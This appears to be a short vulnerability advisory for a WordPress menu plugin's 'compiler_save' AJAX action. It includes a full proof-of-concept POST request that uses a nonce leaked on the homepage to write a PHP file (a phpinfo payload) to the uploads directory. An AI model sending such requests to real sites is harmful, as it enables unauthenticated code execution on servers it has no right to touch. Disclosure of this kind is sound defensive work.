The compiler_save AJAX action, available to both authenticated and unauthenticated users did not check the extension of the imported file, and had the nonce used for CSRF check displayed in the homepage. This could allow unauthenticated users to create an arbitrary PHP file on the blog, leading to RCE.
Get the nonce from the homepage, ie var quadmenu = {"nonce":"b74eed0e4f","gutter":"30"}; POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: YOLO Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 120 Connection: close action=quadmenu_compiler_save&nonce=b74eed0e4f&output[imports][0]=info.php&output[css]=%3c%3fphp%20phpinfo()%3b%20%3f%3e The created file will be located at /wp-content/uploads/<main-theme>/info.php (path is in the response)
2021-02-22 (about 2 years ago)
2021-02-22 (about 2 years ago)
2021-02-23 (about 2 years ago)